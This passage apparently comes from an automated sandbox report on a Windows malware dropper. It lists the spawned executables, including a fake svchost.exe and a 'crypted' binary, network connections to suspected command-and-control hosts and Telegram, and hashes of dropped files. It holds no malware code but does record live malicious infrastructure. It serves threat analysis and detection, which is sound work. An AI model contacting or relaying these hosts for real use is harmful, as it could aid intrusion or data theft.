"C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe"

C:\Windows\system32\cmdkey.exe

cmdkey /delete: 211.168.94.177

C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe

"C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.log

C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"

C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe

"C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe"

C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe

"C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe"

C:\Users\Admin\AppData\Local\Temp\Files\builder.exe

"C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"

C:\Users\Admin\AppData\Local\Temp\Files\build.exe

"C:\Users\Admin\AppData\Local\Temp\Files\build.exe"

C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe

"C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe"

C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 600

C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe"

C:\Users\Admin\AppData\Local\Temp\Files\ptihjawdthas.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ptihjawdthas.exe"

C:\Users\Admin\AppData\Local\Temp\Files\key.exe

"C:\Users\Admin\AppData\Local\Temp\Files\key.exe"

C:\Users\Admin\AppData\Local\Temp\Files\t.exe

"C:\Users\Admin\AppData\Local\Temp\Files\t.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 264

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 6396 -s 3656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6904 -ip 6904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6392 -ip 6392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5428 -ip 5428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6904 -s 360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 205276

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 16.182.99.201:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 22.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 201.99.182.16.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
RU 185.215.113.217:80 185.215.113.217 tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 217.113.215.185.in-addr.arpa udp
RU 212.15.49.155:4449 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
RU 185.215.113.66:80 185.215.113.66 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 rddissisifigifidi.net udp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
NL 45.66.231.185:8080 tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 twizt.net udp
RU 185.215.113.66:80 twizt.net tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 krewdulyi.cc udp
FI 135.181.177.148:58001 krewdulyi.cc tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
RU 185.215.113.66:80 twizt.net tcp
N/A 127.0.0.1:61450 tcp
RU 212.15.49.155:4449 tcp
RU 185.215.113.84:80 185.215.113.84 tcp
US 8.8.8.8:53 84.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 storage.soowim.co.kr udp
KR 210.216.165.152:443 storage.soowim.co.kr tcp
VN 103.211.201.109:6000 tcp
RU 185.215.113.66:80 twizt.net tcp
US 8.8.8.8:53 152.165.216.210.in-addr.arpa udp
US 8.8.8.8:53 aeufoeahfouefhg.top udp
RU 185.215.113.66:80 aeufoeahfouefhg.top tcp
KR 211.168.94.177:3389 tcp
CN 183.57.21.131:8095 tcp
N/A 127.0.0.1:65415 tcp
N/A 127.0.0.1:65420 tcp
N/A 127.0.0.1:65422 tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
NL 45.66.231.185:8080 tcp
NL 45.66.231.185:8080 tcp
RU 185.215.113.66:80 aeufoeahfouefhg.top tcp
DK 95.154.24.73:9001 tcp
RU 45.140.170.187:9001 tcp
US 208.95.112.1:80 ip-api.com tcp
SG 58.185.69.242:8443 tcp
DE 41.216.183.9:8080 41.216.183.9 tcp
RU 185.215.113.66:80 aeufoeahfouefhg.top tcp
US 8.8.8.8:53 twizthash.net udp
RU 185.215.113.66:5152 twizthash.net tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 9.183.216.41.in-addr.arpa udp
FI 135.181.177.148:58001 krewdulyi.cc tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 8.8.8.8:53 141.233.202.91.in-addr.arpa udp
N/A 127.0.0.1:8568 tcp
RU 212.15.49.155:4449 tcp
N/A 127.0.0.1:49335 tcp
N/A 127.0.0.1:6000 tcp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.72.235.82:80 www.update.microsoft.com tcp
US 8.8.8.8:53 82.235.72.20.in-addr.arpa udp
VN 103.211.201.109:6000 tcp
US 8.8.8.8:53 arcsystem.rodopibg.net udp
BG 88.80.152.1:80 arcsystem.rodopibg.net tcp
US 8.8.8.8:53 noithaticon.vn udp
US 8.8.8.8:53 1.152.80.88.in-addr.arpa udp
VN 103.221.220.14:443 noithaticon.vn tcp
AO 102.219.187.80:40500 udp
UZ 90.156.162.5:40500 tcp
US 8.8.8.8:53 14.220.221.103.in-addr.arpa udp
US 8.8.8.8:53 80.187.219.102.in-addr.arpa udp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 136.243.104.235:443 tcp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 235.104.243.136.in-addr.arpa udp
N/A 127.0.0.1:5552 tcp
CH 85.195.235.248:9001 tcp
AT 86.59.21.38:443 tcp
US 8.8.8.8:53 www.ammyy.com udp
DE 136.243.18.118:80 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp
VN 103.211.201.109:6000 tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.135.115:80 r11.o.lencr.org tcp
IR 89.44.147.157:40500 udp
US 8.8.8.8:53 118.18.243.136.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 157.147.44.89.in-addr.arpa udp
US 8.8.8.8:53 115.135.221.88.in-addr.arpa udp
N/A 127.0.0.1:5552 tcp
DE 185.233.107.110:9030 tcp
NL 45.66.231.185:8080 tcp
US 8.8.8.8:53 jirafasaltas.fun udp
US 172.67.193.102:443 jirafasaltas.fun tcp
N/A 127.0.0.1:5552 tcp
US 8.8.8.8:53 102.193.67.172.in-addr.arpa udp
NL 45.66.231.185:8080 tcp
SY 5.134.254.142:40500 udp
US 8.8.8.8:53 142.254.134.5.in-addr.arpa udp
FI 135.181.177.148:58001 krewdulyi.cc tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:5552 tcp
KZ 178.88.234.149:40500 udp
US 8.8.8.8:53 149.234.88.178.in-addr.arpa udp
N/A 127.0.0.1:6000 tcp
RU 212.15.49.155:4449 tcp
N/A 127.0.0.1:5552 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
UA 93.175.220.40:40500 udp
US 8.8.8.8:53 40.220.175.93.in-addr.arpa udp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:6000 tcp
DZ 41.98.226.45:40500 udp
RU 83.243.68.194:49005 tcp
US 128.31.0.39:9101 tcp
US 8.8.8.8:53 45.226.98.41.in-addr.arpa udp
N/A 127.0.0.1:5552 tcp
KZ 46.36.149.47:40500 tcp
N/A 127.0.0.1:5552 tcp
YE 178.130.118.237:40500 udp
HU 91.219.236.197:443 tcp
US 8.8.8.8:53 237.118.130.178.in-addr.arpa udp
NL 45.66.231.185:8080 tcp
N/A 127.0.0.1:5552 tcp
DZ 105.103.151.212:40500 udp
N/A 127.0.0.1:6000 tcp
US 8.8.8.8:53 212.151.103.105.in-addr.arpa udp
NL 45.66.231.185:8080 tcp
FI 135.181.177.148:58001 krewdulyi.cc tcp
N/A 127.0.0.1:5552 tcp
NL 45.66.33.45:443 tcp
UZ 213.230.97.32:40500 udp
US 8.8.8.8:53 32.97.230.213.in-addr.arpa udp
RU 212.15.49.155:4449 tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:6000 tcp
MX 189.167.57.71:40500 udp
US 8.8.8.8:53 71.57.167.189.in-addr.arpa udp
US 45.79.70.147:9001 tcp
N/A 127.0.0.1:5552 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 pb.agnt.ru udp
RU 45.90.34.133:443 pb.agnt.ru tcp
IR 5.238.93.200:40500 udp
N/A 127.0.0.1:5552 tcp
US 8.8.8.8:53 133.34.90.45.in-addr.arpa udp
US 8.8.8.8:53 200.93.238.5.in-addr.arpa udp
RU 31.47.175.39:40500 tcp
VN 103.211.201.109:6000 tcp
RU 109.173.111.27:40500 udp
N/A 127.0.0.1:5552 tcp
US 8.8.8.8:53 27.111.173.109.in-addr.arpa udp
N/A 127.0.0.1:5552 tcp
NL 45.66.231.185:8080 tcp
SY 77.44.131.125:40500 udp
FI 135.181.177.148:58001 krewdulyi.cc tcp
US 8.8.8.8:53 loeghaiofiehfihf.to udp
RU 185.215.113.66:80 loeghaiofiehfihf.to tcp
DE 89.163.128.26:9001 tcp
US 8.8.8.8:53 125.131.44.77.in-addr.arpa udp
CN 47.98.177.117:8888 tcp
NL 45.66.231.185:8080 tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:6000 tcp
UZ 90.156.163.119:40500 udp
US 8.8.8.8:53 119.163.156.90.in-addr.arpa udp
RU 212.15.49.155:4449 tcp
US 154.35.175.225:443 tcp
N/A 127.0.0.1:5552 tcp
KZ 37.151.27.190:40500 udp
US 8.8.8.8:53 190.27.151.37.in-addr.arpa udp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:6000 tcp
N/A 127.0.0.1:5552 tcp

Files

memory/5004-0-0x0000000074EDE000-0x0000000074EDF000-memory.dmp

memory/5004-1-0x00000000006B0000-0x00000000006B8000-memory.dmp

memory/5004-2-0x0000000005130000-0x00000000051CC000-memory.dmp

memory/5004-3-0x0000000074ED0000-0x0000000075680000-memory.dmp

memory/4452-6-0x00000160A7160000-0x00000160A7161000-memory.dmp

memory/4452-5-0x00000160A7160000-0x00000160A7161000-memory.dmp

memory/4452-4-0x00000160A7160000-0x00000160A7161000-memory.dmp

memory/4452-16-0x00000160A7160000-0x00000160A7161000-memory.dmp

memory/4452-15-0x00000160A7160000-0x00000160A7161000-memory.dmp

memory/4452-14-0x00000160A7160000-0x00000160A7161000-memory.dmp

memory/4452-13-0x00000160A7160000-0x00000160A7161000-memory.dmp

memory/4452-12-0x00000160A7160000-0x00000160A7161000-memory.dmp

memory/4452-11-0x00000160A7160000-0x00000160A7161000-memory.dmp

memory/4452-10-0x00000160A7160000-0x00000160A7161000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe

MD5 0143accc4350dcc3d211d0453f0db35c
SHA1 90a15d873d020b9e89c81c3240835ea939302ead
SHA256 76089a25e76533661a8e8712847e024151b6c7b390634edd8cf1968d04917e57
SHA512 36d5e9ff52d31f00f494a9f7bb840a0c37f8aaec065e633fdb6a3509745a5c2fdabcc47e6a6779ce9c019aedbc997770f59e10ab24203f17bf3bd1bb976c483f

memory/536-28-0x0000000000400000-0x000000000184E000-memory.dmp

memory/5004-29-0x0000000074EDE000-0x0000000074EDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe

MD5 e619fff5751a713cf445da24a7a12c94
SHA1 9fc67a572c69158541aaaab0264607ada70a408c
SHA256 11fbd295494309d56d775a11f805544737ce71d058a716194c0fd5b800cdc6d9
SHA512 07420c9a0336ae350567abf68d7f5ef52b34c4c010dbabae6693bf27fd5a50a8b2b16696a3bed7bdc846d542eb04ce6102d5387484f352f9d09c8789ccfcd9ae

memory/1184-42-0x0000000000CA0000-0x0000000000D26000-memory.dmp

memory/536-43-0x0000000000400000-0x000000000184E000-memory.dmp

memory/1184-44-0x0000000005410000-0x0000000005416000-memory.dmp

memory/5004-45-0x0000000074ED0000-0x0000000075680000-memory.dmp

C:\Users\Admin\AppData\Roaming\gdi32.dll

MD5 8d662564d514751028c65d96c696271f
SHA1 8e27943b7b901a808d39a7ee6977e1d3769a15fb
SHA256 86af5d6ee9d824ec2dfa73f44b9ae285d33e9748a8b6dbd4333d1ae06cf6f72b
SHA512 0a5460bbe7f43db560a08e508381613098a28de208a9d85c9c41fffa62b1e0299389a575dfa2b78767d3dd0fc73f0c88677ca32d7fe4e87698def1386cf35bef

memory/536-47-0x0000000000400000-0x000000000184E000-memory.dmp

memory/1184-46-0x000000000A020000-0x000000000A54C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

MD5 b365e0449d1e426156963af99da3f9c1
SHA1 0ec88a37b6bb449755bf27001a199e134bc301c1
SHA256 938386b9f508c8d0c5cfe1a41248e2cbdf42fe29a93910598bd94bfee605159d
SHA512 03a7ef914122c3985de15b8e49025c8d4f784aa9452ed123023a3e5e0ef19a52f013bf7d572aa997c347770d95dc60b516074f0ac4d29fbd1e0dfccd49044c51

memory/3936-63-0x00000000010F0000-0x000000000112C000-memory.dmp

memory/536-66-0x0000000005EE0000-0x000000000605A000-memory.dmp

memory/1184-68-0x0000000005ED0000-0x0000000006474000-memory.dmp

memory/3992-67-0x00000000004F0000-0x000000000050A000-memory.dmp

memory/1184-69-0x0000000005A20000-0x0000000005AB2000-memory.dmp

memory/3936-70-0x00000000010F0000-0x000000000111C000-memory.dmp

memory/536-76-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-119-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-123-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-121-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/1184-154-0x0000000005AE0000-0x0000000005AEA000-memory.dmp

memory/536-117-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-115-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-114-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-111-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-109-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-107-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-103-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-101-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-100-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-97-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-95-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-105-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-93-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-91-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-89-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-87-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-85-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-83-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-82-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-79-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-77-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-73-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-72-0x0000000005EE0000-0x0000000006053000-memory.dmp

memory/536-1149-0x00000000067E0000-0x00000000068CC000-memory.dmp

memory/536-1150-0x0000000006930000-0x000000000697C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\build.exe

MD5 c8cf26425a6ce325035e6da8dfb16c4e
SHA1 31c2b3a26c05b4bf8dea8718d1df13a0c2be22ee
SHA256 9f7be9bf913d8378f094b3f6416db9aa4c80c380000202f7cfaddadb6efc41b4
SHA512 0321e48e185c22165ac6429e08afac1ccfdf393249436c8eac8a6d64794b3b399740aa5b2be23d568f57495d17e9220280ed1c2ea8f012b2c4021beb02cbc646

C:\Users\Admin\AppData\Local\Temp\Files\333.exe

MD5 b73ecb016b35d5b7acb91125924525e5
SHA1 37fe45c0a85900d869a41f996dd19949f78c4ec4
SHA256 b3982e67820abc7b41818a7236232ce6de92689b76b6f152fab9ef302528566d
SHA512 0bea9890dbcd3afd2889d0e7c0f2746995169e7b424f58d4998c50bc49d2b37d30f5bd1845d3079b25f9963af2b71f136719cbd9fda37f7b85874992096b3e1d

memory/5976-1207-0x00000000022F0000-0x0000000002326000-memory.dmp

memory/5976-1208-0x0000000004E00000-0x0000000005428000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\python310.dll

MD5 c80b5cb43e5fe7948c3562c1fff1254e
SHA1 f73cb1fb9445c96ecd56b984a1822e502e71ab9d
SHA256 058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20
SHA512 faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe

MD5 1cf17408048317fc82265ed6a1c7893d
SHA1 9bfec40d6eb339c5a6c2ad6e5fa7cebc147654c5
SHA256 1352ad9860a42137b096d9675a7b8d578fbc596d965de3cb352619cbe6aaf4e9
SHA512 66322d7cb5931017acaa29970da48642d03ce35007f130511b2848b67169c1dd4167f1e5a31e5e1dfe5f7122846482bdb878b5cd695ac58009033fd620813a0f

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\vcruntime140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe

MD5 0c883b1d66afce606d9830f48d69d74b
SHA1 fe431fe73a4749722496f19b3b3ca0b629b50131
SHA256 d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1
SHA512 c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\cryptography\hazmat\bindings\_rust.pyd

MD5 f918173fbdc6e75c93f64784f2c17050
SHA1 163ef51d4338b01c3bc03d6729f8e90ae39d8f04
SHA256 2c7a31dec06df4eec6b068a0b4b009c8f52ef34ace785c8b584408cb29ce28fd
SHA512 5405d5995e97805e68e91e1f191dc5e7910a7f2ba31619eb64aff54877cbd1b3fa08b7a24b411d095edb21877956976777409d3db58d29da32219bf578ce4ef2

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

MD5 adc412384b7e1254d11e62e451def8e9
SHA1 04e6dff4a65234406b9bc9d9f2dcfe8e30481829
SHA256 68b80009ab656ffe811d680585fac3d4f9c1b45f29d48c67ea2b3580ec4d86a1
SHA512 f250f1236882668b2686bd42e1c334c60da7abec3a208ebebdee84a74d7c4c6b1bc79eed7241bc7012e4ef70a6651a32aa00e32a83f402475b479633581e0b07

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_hashlib.pyd

MD5 49ce7a28e1c0eb65a9a583a6ba44fa3b
SHA1 dcfbee380e7d6c88128a807f381a831b6a752f10
SHA256 1be5cfd06a782b2ae8e4629d9d035cbc487074e8f63b9773c85e317be29c0430
SHA512 cf1f96d6d61ecb2997bb541e9eda7082ef4a445d3dd411ce6fd71b0dfe672f4dfaddf36ae0fb7d5f6d1345fbd90c19961a8f35328332cdaa232f322c0bf9a1f9

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\yarl\_quoting_c.pyd

MD5 8b4cd87707f15f838b5db8ed5b5021d2
SHA1 bbc05580a181e1c03e0a53760c1559dc99b746fe
SHA256 eefb46501ef97baf29a93304f58674e70f5ccecafb183f230e5ce7872a852f56
SHA512 6768cff12fa22fe8540a3f6bdb350a5fcec0b2a0f01531458eb23f77b24460620cd400078fd1ec63738884c2b78920e428126833953c26b8dc8ad8b7c069415d

memory/5976-1277-0x0000000005760000-0x0000000005AB4000-memory.dmp

memory/536-1278-0x0000000000400000-0x000000000184E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\unicodedata.pyd

MD5 102bbbb1f33ce7c007aac08fe0a1a97e
SHA1 9a8601bea3e7d4c2fa6394611611cda4fc76e219
SHA256 2cf6c5dea30bb0584991b2065c052c22d258b6e15384447dcea193fdcac5f758
SHA512 a07731f314e73f7a9ea73576a89ccb8a0e55e53f9b5b82f53121b97b1814d905b17a2da9bd2eda9f9354fc3f15e3dea7a613d7c9bc98c36bba653743b24dfc32

memory/5976-1280-0x00000000061E0000-0x000000000622C000-memory.dmp

memory/5976-1279-0x0000000005C60000-0x0000000005C7E000-memory.dmp

memory/5976-1269-0x00000000055F0000-0x0000000005656000-memory.dmp

memory/5976-1268-0x0000000005580000-0x00000000055E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kzb2r2rq.kdo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5976-1262-0x00000000054E0000-0x0000000005502000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\multidict\_multidict.pyd

MD5 ddd4c0ae1e0d166c22449e9dcdca20d7
SHA1 ff0e3d889b4e8bc43b0f13aa1154776b0df95700
SHA256 74ec52418c5d38a63add94228c6f68cf49519666ae8bcb7ac199f7d539d8612c
SHA512 c8464a77ba8b504ba9c7873f76499174095393c42dc85a9c1be2875c3661cda928851e37013e4ac95ba539eed984bf71c0fcc2cb599f3f0c4c1588d4a692bdfd

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\aiohttp\_helpers.pyd

MD5 d2bf6ca0df56379f1401efe347229dd2
SHA1 95c6a524a9b64ec112c32475f06a0821ff7e79c9
SHA256 04d56d6aa727665802283b8adf9b873c1dd76dfc7265a12c0f627528ba706040
SHA512 b4a2b9f71b156731aa071d13bf8dcffec4091d8d2fab47aea1ff47cd7abff13e28acf1d9456a97eb7a5723dbfa166fc63de11c63dc5cb63b13b4df9930390377

memory/3080-1297-0x00000204C91B0000-0x00000204C91D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\aiohttp\_http_parser.pyd

MD5 9642c0a5fb72dfe2921df28e31faa219
SHA1 67a963157ee7fc0c30d3807e8635a57750ca0862
SHA256 580a004e93bed99820b1584dffaf0c4caa9fbbf4852ccded3b2b99975299367b
SHA512 f84b7cde87186665a700c3017efcbcc6c19f5dc2c7b426d427dddbcbdec38b6189dd60ce03153fb14b6ea938d65aab99da33bda63b48e3e9ce9e5d3555b50a04

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\aiohttp\_http_writer.pyd

MD5 e16a71fc322a3a718aeaeaef0eeeab76
SHA1 78872d54d016590df87208518e3e6515afce5f41
SHA256 51490359d8079232565187223517eca99e1ce55bc97b93cf966d2a5c1f2e5435
SHA512 a9a7877aa77d000ba2dd7d96cf88a0e9afb6f6decb9530c1d4e840c270dd1805e73401266b1c8e17c1418effb823c1bd91b13f82dbfc6dba455940e3e644de54

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_overlapped.pyd

MD5 7e6bd435c918e7c34336c7434404eedf
SHA1 f3a749ad1d7513ec41066ab143f97fa4d07559e1
SHA256 0606a0c5c4ab46c4a25ded5a2772e672016cac574503681841800f9059af21c4
SHA512 c8bf4b1ec6c8fa09c299a8418ee38cdccb04afa3a3c2e6d92625dbc2de41f81dd0df200fd37fcc41909c2851ac5ca936af632307115b9ac31ec020d9ed63f157

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_asyncio.pyd

MD5 6eb3c9fc8c216cea8981b12fd41fbdcd
SHA1 5f3787051f20514bb9e34f9d537d78c06e7a43e6
SHA256 3b0661ef2264d6566368b677c732ba062ac4688ef40c22476992a0f9536b0010
SHA512 2027707824d0948673443dd54b4f45bc44680c05c3c4a193c7c1803a1030124ad6c8fbe685cc7aaf15668d90c4cd9bfb93de51ea8db4af5abe742c1ef2dcd08b

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\libssl-1_1.dll

MD5 de72697933d7673279fb85fd48d1a4dd
SHA1 085fd4c6fb6d89ffcc9b2741947b74f0766fc383
SHA256 ed1c8769f5096afd000fc730a37b11177fcf90890345071ab7fbceac684d571f
SHA512 0fd4678c65da181d7c27b19056d5ab0e5dd0e9714e9606e524cdad9e46ec4d0b35fe22d594282309f718b30e065f6896674d3edce6b3b0c8eb637a3680715c2c

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\libcrypto-1_1.dll

MD5 ab01c808bed8164133e5279595437d3d
SHA1 0f512756a8db22576ec2e20cf0cafec7786fb12b
SHA256 9c0a0a11629cced6a064932e95a0158ee936739d75a56338702fed97cb0bad55
SHA512 4043cda02f6950abdc47413cfd8a0ba5c462f16bcd4f339f9f5a690823f4d0916478cab5cae81a3d5b03a8a196e17a716b06afee3f92dec3102e3bbc674774f2

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_ssl.pyd

MD5 35f66ad429cd636bcad858238c596828
SHA1 ad4534a266f77a9cdce7b97818531ce20364cb65
